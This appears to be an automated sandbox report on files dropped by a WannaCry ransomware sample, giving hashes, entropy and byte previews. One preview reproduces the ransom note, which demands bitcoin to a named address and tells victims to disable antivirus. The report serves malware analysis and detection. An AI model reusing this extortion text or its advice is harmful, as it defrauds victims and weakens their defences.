                                                                                      Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Mar 23 13:47:49 2024, mtime=Sat Mar 23 13:47:49 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1189
                                                                                      Entropy (8bit):5.040493253287504
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:88qLHOLm86eCRBlgK21Z5bpEO9l7vQAPic3qygm:882HOLm8iRyv17vPQyg
                                                                                      MD5:702D04031DD9BF002906D9511CD8FA24
                                                                                      SHA1:332DBCC83F66AEE905A99AE92416F189CFCF545F
                                                                                      SHA-256:704A9F74AA11DF406AF01B1B417E5BEC073220739AA562F76DC18804C04F7BD4
                                                                                      SHA-512:6D246DCDDF79E7EC911A80C6F8DA38B292A79946B01C1E4BCED43347649018A7BCFD29812D8DC6DE61672F013246F571C1F7C07C7309E20DD3A13154788FEB8A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:L..................F.... ....{Q.1}...'g.1}...X.H............................X.:..DG..Yr?.D..U..k0.&...&.........{4.....S.0}....q.1}......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.HwX.u..............................A.p.p.D.a.t.a...B.P.1.....wX.u..Local.<......FW.HwX.u...........................M..L.o.c.a.l.....N.1.....wX.u..Temp..:......FW.HwX.u..........................O...T.e.m.p.......1.....wX.u..TEMP1_~1.ZIP..l......wX.uwX.u....c.....................?.o.T.e.m.p.1._.R.a.n.s.o.m.w.a.r.e...W.a.n.n.a.C.r.y...z.i.p.....t.2......J.. .@WANAD~1.EXE..X......wX.uwX.u.....Y........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......................-...........................C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .P.............%..hT..CrF.f4... .P.............%.............1SPS.XF.L8C.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:COM executable for DOS
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.804368499083209
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:eHQ+6sB55IVAWQS8BJDvcgZpkgOAcfwhNL:ew3sOAWQSEJDvcTjAcfYNL
                                                                                      MD5:1D6895FD5F410D627496C9FDB2EF264F
                                                                                      SHA1:3AFC91BD33DBE679440B8F26D77CBC7E040FD262
                                                                                      SHA-256:B72ACE55898E9547CCFC69551DC5C06485DFE2398DA87A22AA3320A4623E5966
                                                                                      SHA-512:90D948AB484C588DA59E253FCCB0F453CA83D10ACC06FFF84C42CC60B2063634271D564E97202D435A37978F759BD24E6EAB3931DFA33070FBDA1B46E9508BC0
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:.T.hb.M_..U...O'.c:.k|>..|.$.....L....NQ..X...:......,E[.D~.$.I*k..S..$g@pn...5M..vmv..$*.....ef..vI....@A>....S...5.._.{YY..g.m}..7..C.g$1....=..t..c.;Q.#.7.7`NR..6....0J.%.`.]..X.Hl.p..A#...=.&=i..3:.&3.0D.h.....U..h@_.ik..!..k...Y.c`..M..H./d..6.Y..(..x.ZD..&.#.Bb&6.....%r....k......j...<....O%d0.<....{..AF.oa...).|.<......u...........'..?.1.....4.W..06J(.....ZI.^.l.Z.j.y.Rh..mx<..P...".....?7.\......l...<s.J..L..c....o...........H.K..I..<N.].R.w15.7)j.d......4.I\?.3.._.*.....L.N_X.....u.,.....K_..I..#....*..B...E...KL4)u......J5...........kZ..Y~..Rr..n%..=... ,......j..Dq.|..1.2f..B...IPo....u.bO...{.V.^...I,.,k=R.]..C...h.>.}.G......I1.>.}.....B."..o.-.'m.i....@P.gB.".\f...'.....Y.t...}.w.W^.m.;.o.C..G.. I#....Q.:..%.[...uE.8...1......'.bD._..o...}........Wo..:T...|)w.X.7@q...(B_"..g.....r'|`.......x....d....x..........!....n3g..j`.4z.$#....L.].d:Gp..^X.p.ds.R.4..S.A.....1.B.!b...gc...$0.?..4Gj*.V.p...e......h.?.!r:g.gH.+..Kj
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.843879281190905
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkEbfSHh80Vnx0enlzic8ZC1UdkvLyk9gs8tm0bMsM+EJXU6ms4qTi:bkFHl/0up9MkSkDykBygbg
                                                                                      MD5:F3898402817C253832D031FFC6ACDB24
                                                                                      SHA1:373A916F4FF68D8AC83EA1D0DB96393567120BE3
                                                                                      SHA-256:8B6C40860F58E53A32E48DDF6BF60352B9B1342E708689F47D79BA71497C7597
                                                                                      SHA-512:97F806351F98042CEDB57F0107AD8F2FE1B2924F141EBFA1DBADA4EF964D6D66535DA7CB4F2D0B40E72F0C48D4B58146092B255876373AB505ACE311A18864CA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....8.=d..~.".S..!.VM..i.[.m.....o..{]D.8..b...;.NCA..q.Vg..W"xf.J...y_....a....q......}.....%9...p.I....B."!...VN=...p...$...~.....XN.&.#*e...F^....^..h..:.|,l......."#B.50.t....i...2.8....dR}>..o..t..}..z.._....)...r...F2.&.b{".\x.|....#9}..*..l............@U.*.P...1).@.z}.D.W......@.%e.vRb.r....b...N....`..!.y.6..;D2.-...}.......w..j...`X..!..s..M.......h.D'Vp.#<..,..L5..?.......T.......:..S.!.....n........|N.s.".....4...L..]...5..........G......Zd...)xHsF#.._..Yg.v..?.?.]...s...k.5....\WV9......b..;.;.[..o...8....m...p.pC.p...@..#..l....|qs...B..s...ku.)R..C9.:.'.t.U..6K..}1.......?G...L.q............N.._./...Ij.Iq7....j.....p.2&.?`...~r:...Y {>RTU.W78.f1B..;...r.~......8F4..:........i.....U..ZK.b.....{.L.a..0...u..`..;.:.a.\.ZJ=....6qO.OU]\7}SN.7.C=.g$mm.. .uK....r.....c.\.G..p.0.|..S,Ah9z.x>W.u..R.!.......d..R...g+f..>...w......o...-.s.....l*...?.+X..2I..{.../`....%P.-.H..Aml61.*..e......Q..........J-IM\W...x.(..A%..~s...'K.Hh
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.843879281190905
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkEbfSHh80Vnx0enlzic8ZC1UdkvLyk9gs8tm0bMsM+EJXU6ms4qTi:bkFHl/0up9MkSkDykBygbg
                                                                                      MD5:F3898402817C253832D031FFC6ACDB24
                                                                                      SHA1:373A916F4FF68D8AC83EA1D0DB96393567120BE3
                                                                                      SHA-256:8B6C40860F58E53A32E48DDF6BF60352B9B1342E708689F47D79BA71497C7597
                                                                                      SHA-512:97F806351F98042CEDB57F0107AD8F2FE1B2924F141EBFA1DBADA4EF964D6D66535DA7CB4F2D0B40E72F0C48D4B58146092B255876373AB505ACE311A18864CA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....8.=d..~.".S..!.VM..i.[.m.....o..{]D.8..b...;.NCA..q.Vg..W"xf.J...y_....a....q......}.....%9...p.I....B."!...VN=...p...$...~.....XN.&.#*e...F^....^..h..:.|,l......."#B.50.t....i...2.8....dR}>..o..t..}..z.._....)...r...F2.&.b{".\x.|....#9}..*..l............@U.*.P...1).@.z}.D.W......@.%e.vRb.r....b...N....`..!.y.6..;D2.-...}.......w..j...`X..!..s..M.......h.D'Vp.#<..,..L5..?.......T.......:..S.!.....n........|N.s.".....4...L..]...5..........G......Zd...)xHsF#.._..Yg.v..?.?.]...s...k.5....\WV9......b..;.;.[..o...8....m...p.pC.p...@..#..l....|qs...B..s...ku.)R..C9.:.'.t.U..6K..}1.......?G...L.q............N.._./...Ij.Iq7....j.....p.2&.?`...~r:...Y {>RTU.W78.f1B..;...r.~......8F4..:........i.....U..ZK.b.....{.L.a..0...u..`..;.:.a.\.ZJ=....6qO.OU]\7}SN.7.C=.g$mm.. .uK....r.....c.\.G..p.0.|..S,Ah9z.x>W.u..R.!.......d..R...g+f..>...w......o...-.s.....l*...?.+X..2I..{.../`....%P.-.H..Aml61.*..e......Q..........J-IM\W...x.(..A%..~s...'K.Hh
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:OpenPGP Public Key
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.806392421034246
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:w4OoXQleqSZ6W7VT0hoFje/dE6gtYshWSBniHu9WrZqF1AzJLV:gtleqGl0qte/dE6gtGSfsdqwzJJ
                                                                                      MD5:6D8DF2FCE1C8E70D09E2DC9B4A1CF24C
                                                                                      SHA1:71973E7A57BB9DF3A911DF795F3FA0A120B9B9BC
                                                                                      SHA-256:C8BFF4F7E764A5CDC9CC6F3D1D084A19E48D797B4FAF2B8B815F0AF3E564B23E
                                                                                      SHA-512:BE71AD3B98706D71D711F0038A1EB6F96BF863ED5E8DE133B17C11FC93D43AE813714740456B42AAA8E9568B4C47780E9D6E66762F2207AE48C80F0A2AD83CDE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..V..!.,Qb&Z:..E...a'...[....z....".......g.C.`....O..lD..(.......F.zJ.Q..,"^.fN...2=.....'ay.as............5!(.{......w....nr`.......7.OJ.53.8`!F.:M..2......b.m.W.....eG.1=Oy..O..t..Xl..~8B.&R.......08..{.1........:..G.1.()..uI.a=...Q.....[.>...JW.....v......m....*..oN....aO...<P..V$..4ES^ ..SH.^.|7.g.....!`._..Q.Gt..e^~.M.9....U.E.ha.y.e....P.W.W&._.:J .LQ-z._.......Q{ .%..#@.. ...w....t....}w...W..4.T...`7<..U;..j.j..Pq.e_.m..u_.E.Y..<.V0Z...Wg\.[.#...s...jO6..}B.A..eO...Y...)^4..d."x...T:.>9+8.. ......?..Y.R....h.k.5..:..mY:/......j.YI.4...VyE5>...g<."+.N..EJ.! B.....9..=...P.u.pmJ........MW..pq.?......7.@..`.(q....Y..Q%....fKW?l..+o.w.G.....`.,...L....]!.r................._.u...1I.?.).>[.@.O.u=.5....Q9ip..A:..B.%..r....c53......A..0..i..C...6@}..d.d....M.....T...[j.\..2.S..1.>..W......a.Yai:$..%.x...z..?MI..Dw.....k....f.\0?:.6]..U.....W.L.!..htV...u.PTR4j./..pq....HW....=.Y.VC.f....!#...k...K&.....$..Q... ....#p....7..m}[..^.CPe
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8472485472649005
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkVOO7bPIGhaNVp9ImRhYqO3PnRp8MXS8yTRPj7CE1Qav2T71UQ9yVpo:bkVOaPDaNT9ImLraPRpTXxyTRPjl1juH
                                                                                      MD5:CA6D089CCF5AD06B85EAEC0E50CB8538
                                                                                      SHA1:BF201A726833673C690E9E3CB8FD35FB3F035ACF
                                                                                      SHA-256:6838348659B3CF77B936A126F90470B26B53E313A3A5431B95556E1EBDD4E042
                                                                                      SHA-512:6417D06961D8A3A68FC90C6860940DC8B679030D41F5A7100552FECF7C7E2EE0736BD183585F96C44F8D8B62846DDA2B0519781FF93F0A1418C4952961FBF214
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....K....#n...9V...{...y0[l..u..f8.H;?.Y..7ft....*"..u..r...{t@...8.C....]n.R....:x.L.+....m.M..p2"..RO.}t..B..Y..*.s...Q...).K...V.z.=.'...h.E+...:.!y?0..E.e...I.N......2.Do.:.,...U........,Stz.H.}.j.3.S.'...Ghb..d`^.fAV.o.m.I.3....%.....n..M..6i....................+..#v.Vq...4H..B..FrU.Q.A....."0....|.|/.....Z..yX$7.7..T...N..-.!`.....;.+&.. 2....`=}Ap7..}XSk.3...%XC.3...*.]....,.J?T<...m...A..Au..A#.^J....V....U.t:.k........t.vq..|..cj..u\[.....&...!.ds%.v.c[.)r.+.g@..M.qt"M...ZnW*.z|....J.C..}v..p4-s.@T.5n.x.J.r3..ZL...'Sw......v......... ..[kW<E.W....'.}a.AN..0.q.c.DY|.....<..6.~'..{7..&V...x............^.G.......@s,..#.......-..).N\h...U.x..r.*...w..&/.=.?@......[...'-.&...\....$..p.wzo.+.[\(t..g.%...J.....'b....&.2i...|...t.T..V9..E(.X1.....e...P}B..M.C....v.vD/..4...O$;g.F:=O..v....m4...4..g`.....(.%.,......?1.Rg$.'.1T$..U.>w.].+i...R.....i.i.^k.65.L.......z@1^......S?6'Y..@.\.....].........A.J...d.....].{...x5..n.Ix.d....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8472485472649005
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkVOO7bPIGhaNVp9ImRhYqO3PnRp8MXS8yTRPj7CE1Qav2T71UQ9yVpo:bkVOaPDaNT9ImLraPRpTXxyTRPjl1juH
                                                                                      MD5:CA6D089CCF5AD06B85EAEC0E50CB8538
                                                                                      SHA1:BF201A726833673C690E9E3CB8FD35FB3F035ACF
                                                                                      SHA-256:6838348659B3CF77B936A126F90470B26B53E313A3A5431B95556E1EBDD4E042
                                                                                      SHA-512:6417D06961D8A3A68FC90C6860940DC8B679030D41F5A7100552FECF7C7E2EE0736BD183585F96C44F8D8B62846DDA2B0519781FF93F0A1418C4952961FBF214
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....K....#n...9V...{...y0[l..u..f8.H;?.Y..7ft....*"..u..r...{t@...8.C....]n.R....:x.L.+....m.M..p2"..RO.}t..B..Y..*.s...Q...).K...V.z.=.'...h.E+...:.!y?0..E.e...I.N......2.Do.:.,...U........,Stz.H.}.j.3.S.'...Ghb..d`^.fAV.o.m.I.3....%.....n..M..6i....................+..#v.Vq...4H..B..FrU.Q.A....."0....|.|/.....Z..yX$7.7..T...N..-.!`.....;.+&.. 2....`=}Ap7..}XSk.3...%XC.3...*.]....,.J?T<...m...A..Au..A#.^J....V....U.t:.k........t.vq..|..cj..u\[.....&...!.ds%.v.c[.)r.+.g@..M.qt"M...ZnW*.z|....J.C..}v..p4-s.@T.5n.x.J.r3..ZL...'Sw......v......... ..[kW<E.W....'.}a.AN..0.q.c.DY|.....<..6.~'..{7..&V...x............^.G.......@s,..#.......-..).N\h...U.x..r.*...w..&/.=.?@......[...'-.&...\....$..p.wzo.+.[\(t..g.%...J.....'b....&.2i...|...t.T..V9..E(.X1.....e...P}B..M.C....v.vD/..4...O$;g.F:=O..v....m4...4..g`.....(.%.,......?1.Rg$.'.1T$..U.>w.].+i...R.....i.i.^k.65.L.......z@1^......S?6'Y..@.\.....].........A.J...d.....].{...x5..n.Ix.d....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.822942739207619
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YVDBllpaZGxWJT723xVSZi8Mn7MRyGZ6ewL0pGDNwm/S3u9/BL+feOn9PCP03OU4:rZGbVSAPwy0/9ma+9/BL8P3pjyHEfm
                                                                                      MD5:62263172B23D3E6B6DD0DC1A2D46363E
                                                                                      SHA1:94EF91734891474DAC3008867795F9308BC69447
                                                                                      SHA-256:1AF272EBFCC6CBF117C11EB5E631394937B2352C6CC273A55863695263DA163A
                                                                                      SHA-512:2022CE00E3EA316828B2B392A7B56DD6A79B3247A8CEB72A1B7450908BD32234F30DCBFDD9E4D2DCF931BC9657330E9277DC21A01A4AAC2BEC9B843484961AE9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:V.p..1H.p.w.$._Y.z.j@U\...uv..$'..+....W.O..L..t..k..*.B......&..tn/(........0......jjK..qFPG..,&PQg.S..+..w...i......]..,.H...^...dj.7...G..L..].....|D.s.C.0x. .....Z8H.DJ./....LW....$.d..U.....J.5.@F.l>..`&..H.4M.}..;..M.Cz^....Sn....)...O.n.c.-r..7J....H....<*M...=........0.sd..~...Z...:.)}...zJ..^.c.TA.qt......E.!Q..qn.w......C)...;u.~A....-.....P{.{&.a.....|.=....i...x..M..........1cL.Qs.C.d...D..`..._.Ty;.N.}Qf.......hJ....H..&........*~.*%.e.)R9RP.`..0+...r.k...X.......R}1*m..}V.Bt^.....w..L..>....U...rZ.WM.A0.i.fH(.qe...N...o'..^.&JS./../.2X...I...v&....O...c....[. #G.bi....@.m....S....wa.t.{..t.T..k;..=...T).W....^Rz.=k....Z.]%..F...oB...s.e6a...4S.....8..8>.'`$.....<.. ...|..g...U..dy8fn....bw#z.38...W.O.q6.......\%..i..K..E.kFb.k....W?...l..x.F<j...`T.oN..$.y8+r0.&..4ku%........?..J...^.?..Y.........`.1`. k.S.R.k....~;.%...a..%...?\....+8....m|....L5..gK5'.?uy(>.+=z[.2.u^.}.$.Qx....~.......a..mns!.h....TJ.n3..=..... oH....JE.t
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.827701253873696
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bktV29EJ26u9p/JWsVwU7XjzrEftCDmhPkzF5IhSqQt7xYMX6bjvcBCcBudj:bkC9Ehqc8wU7XjzaPkzF5Nt7606bjvEy
                                                                                      MD5:5ACA33D3A8F4FBC3959E3CB7A6C8785E
                                                                                      SHA1:001F83C416D0BDD85914C2E4D23382D9CADFF008
                                                                                      SHA-256:BCD3657FEBB3C1204FE8841DB65D0DA0FEC026B906C98B820659BC83C1326B40
                                                                                      SHA-512:687BC3B060A0FAAA19F15FF64DDE112A45C98265FC74E642BAEFE2F5841591B66337EEA7973220292DEA5B3830D1B0542A76C732E683199CBED1CCAB36012B54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......'(<JI..T..3G..V..y..H?L.H......[.k.^.VRJ .#....b....I....||.....9.N.U.. ...sI...Z..-)..5q.........yI...N3Y.M.Kl.Q........k.K....V.!..x...F=............@..x*.V.[nE1....._.w........t.JEg.eq..;J..w0/.N...`..;.Chb._....y.b.+..n.|.w...zYVQ..f#................J..z.E?.$.4o@......(C...J.'.y.*..S......!.......;h..>.."..!B;.N.`.[.N..*U..=.....`..|EK..a.4...q....E..;.+.$.j1.o.d......Y..E..8..x*.=v..0?F....=E............^..`...8O...I..;.@%/.,I......F.Lq.s...W..}.DI..jMT[..5;R.1...+P..b.f.R..O%.0..U..{....u..R.....K..`.... .|..N...-R6.\*Uk.....:.)...l.....&........L.%^...._......^3.G.'..@.....e ..z..0....I.....{C..V:....F._.5.*...S.D..[.V...:.J.%..&Lx]..G(..P.ob}^0......T..N`.X#.....:....N....T.$.M.v.)...3...J..8...@...~@......qS........7.,....,.x./F-..`4.=.{ITa...>wR..f...M....l.Mg(.Z6........W.p.0....z..Sw7.!=.$..6....{...S.}*..z.8....Tn..N.V4?lg.(.B:q.5qq_<.........V..U.i..MH..b.FVS....T.M...W........#c......H....=5....*...o...U2E.@
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.827701253873696
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bktV29EJ26u9p/JWsVwU7XjzrEftCDmhPkzF5IhSqQt7xYMX6bjvcBCcBudj:bkC9Ehqc8wU7XjzaPkzF5Nt7606bjvEy
                                                                                      MD5:5ACA33D3A8F4FBC3959E3CB7A6C8785E
                                                                                      SHA1:001F83C416D0BDD85914C2E4D23382D9CADFF008
                                                                                      SHA-256:BCD3657FEBB3C1204FE8841DB65D0DA0FEC026B906C98B820659BC83C1326B40
                                                                                      SHA-512:687BC3B060A0FAAA19F15FF64DDE112A45C98265FC74E642BAEFE2F5841591B66337EEA7973220292DEA5B3830D1B0542A76C732E683199CBED1CCAB36012B54
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......'(<JI..T..3G..V..y..H?L.H......[.k.^.VRJ .#....b....I....||.....9.N.U.. ...sI...Z..-)..5q.........yI...N3Y.M.Kl.Q........k.K....V.!..x...F=............@..x*.V.[nE1....._.w........t.JEg.eq..;J..w0/.N...`..;.Chb._....y.b.+..n.|.w...zYVQ..f#................J..z.E?.$.4o@......(C...J.'.y.*..S......!.......;h..>.."..!B;.N.`.[.N..*U..=.....`..|EK..a.4...q....E..;.+.$.j1.o.d......Y..E..8..x*.=v..0?F....=E............^..`...8O...I..;.@%/.,I......F.Lq.s...W..}.DI..jMT[..5;R.1...+P..b.f.R..O%.0..U..{....u..R.....K..`.... .|..N...-R6.\*Uk.....:.)...l.....&........L.%^...._......^3.G.'..@.....e ..z..0....I.....{C..V:....F._.5.*...S.D..[.V...:.J.%..&Lx]..G(..P.ob}^0......T..N`.X#.....:....N....T.$.M.v.)...3...J..8...@...~@......qS........7.,....,.x./F-..`4.=.{ITa...>wR..f...M....l.Mg(.Z6........W.p.0....z..Sw7.!=.$..6....{...S.}*..z.8....Tn..N.V4?lg.(.B:q.5qq_<.........V..U.i..MH..b.FVS....T.M...W........#c......H....=5....*...o...U2E.@
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.805783785313747
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Kfu0ANbRb6VHyA+B/AmdDpjUQMfiqUITq1Wl5UyD1r9S:KqIHyAnmhpjSNUITqsHzD1r9S
                                                                                      MD5:162D27246FA4671D4ECF44D17AA17E60
                                                                                      SHA1:249845CEC8E4E66B23AC1BF01D87C8D72710E660
                                                                                      SHA-256:887125E222022999DCD2B526C3DA8ABA900B38A1686899406A706E647C423D39
                                                                                      SHA-512:0AAC4542494161D25BE3E681F3A6DDCC02E13EA7671D5C867321E0CE34D9B4E83A4B9ACAD3549869593C3F7DE1ECC41B00A2B12EBB4E94FA95BF0F0AC9E866F8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:j.L. ..yj.p....:]N..B.H...E'I..U....Jb3.C.-.R.J.S.......Q.p&WA.....0....Y..[..~..~NJD...d...U...S..U..(+.<..S.l^7.'.....T...K....f.....@(.!......0.D...e.t.F.nBL..N.k.....)...QEP.G..Ef.2........6.e%?.....H...].O1.....g\..Qr.........X^...Z...r[;...>....I?O..c..["....$p..~"..QH......8...\.@.B$...S.^......\.."=F.x.~<..h. ...1..G.M.....Y.Q.b.e.$D.a.dbO_.....V..X47.U%hr4]...-.....o.,.?..H..Oj....3.r.....+-.D...-.-..[5E...*.1...BR.j0{_.Dz^.{M.....H..U.b..k...0Tu...0..g..q.!.jNt..e....>.Q.H.A.2...|8.;.=.uVQ.Z..I..e.G.....ul.....|..5p.!.=.{.&.D.....~M..L...(._...3.X..R.}.G.0...../C.......u..I.{+x.=..V.jR-...".].M/`.z../.%....A........If...y.......^B..h.f..K.....1%"ZrB.d#QnP.E.3tL...1.x?r.W..4..B....en...}.>.S..q.....g..o..C;I.......V..y3..G.zZ..x..O.z!B.....UWF.y....<..6..i[.Y...........W..a.A.AV.Rx.09.;.4=...@(a,".@g.^..s..9u.....o.-G.ijH#C{..z.=..&)..PQ.O.Z....i............89....r......RE|......e.G~.Y....9.H.o.*n.i^......B.....,m..l....z..Y
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8346416882265295
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk1jCF3u875abKCw6MlEXUCLavhSXXMuELWcrET/acO7LlGnZcMnHz8zqHs:bk8FrIbKCw6McbnLsAnkWM
                                                                                      MD5:01624FEDC41E1C3543B8C537A4370797
                                                                                      SHA1:3ABADA34A34EBCC714BB850F1CB490A8E72D0FD3
                                                                                      SHA-256:9173C42AB010C2F6FC471ABD8476F163AB07658AB77A1165C3569CD4DEF72B90
                                                                                      SHA-512:37AA4AA2FEA5C521B4E24ACC6D2DAD6A4C51B1216531517DF029EDC1D2D5D10660401F935EAB7FE091DE22B29D4B38DF27F660BB40BDF79AF1360111E032D230
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Z...ni4..|...H....X:&....Vn...Kh=...8.AQ]>..........SwG.=...+.&p.."O.".......sX;.n.T.....^-..*w.,..Ax.p....A.8.[..4..Cq2.....N...f[..E..d.Z..a.>..3..A.....,Y.......l.:........1.......Lb....v......~.e........7=....}d.>5j...g..Gn...r...#='..z.............x......${.U...R\%..!.Et..=.B..[.A!R...}...G.#...(J..~..>.Q.....B.W-.#..s.0...6.*/..d...$.{Z..r..:..yG~..[...=..}[.;ki..().7......qF....W.4.5...O.#[.q;.#dn....[...A..A.8.....$.....e...bQ..`RZ....2..Z....Xq.B..f.r...Y.~..W..&n.2.Z...[.} ..{...?.v.!.w Uhj....:Oz.%.X.......2-!.;...;..N?.QT....>.R6.......KRz.|7..#[w.K...i.s.01..1@..~.......A-........E...\b.t.R...s5..W../.T..35N.e..W....{...A.....Z..M..).v]6!..h...Yf....=..I..'....Cz\...x..3..........[VH..$...2....4.."j.....N._2/.uJU..T.&..yAM.{.l..gN.V....#..Y!P....#.'Q#...r.X..w.4......]?.G....b.Bha.%.c.c.....~......P.....Y(.[..^.%.'.m..X..x.........qy... ...*..o*...}.. H.rI';O..Q.^'m...)I.g4.z...g.P.c?.ja...F)..)..q.L.xF....?.o..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.8346416882265295
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk1jCF3u875abKCw6MlEXUCLavhSXXMuELWcrET/acO7LlGnZcMnHz8zqHs:bk8FrIbKCw6McbnLsAnkWM
                                                                                      MD5:01624FEDC41E1C3543B8C537A4370797
                                                                                      SHA1:3ABADA34A34EBCC714BB850F1CB490A8E72D0FD3
                                                                                      SHA-256:9173C42AB010C2F6FC471ABD8476F163AB07658AB77A1165C3569CD4DEF72B90
                                                                                      SHA-512:37AA4AA2FEA5C521B4E24ACC6D2DAD6A4C51B1216531517DF029EDC1D2D5D10660401F935EAB7FE091DE22B29D4B38DF27F660BB40BDF79AF1360111E032D230
                                                                                      Malicious:false
                                                                                      Reputation:low
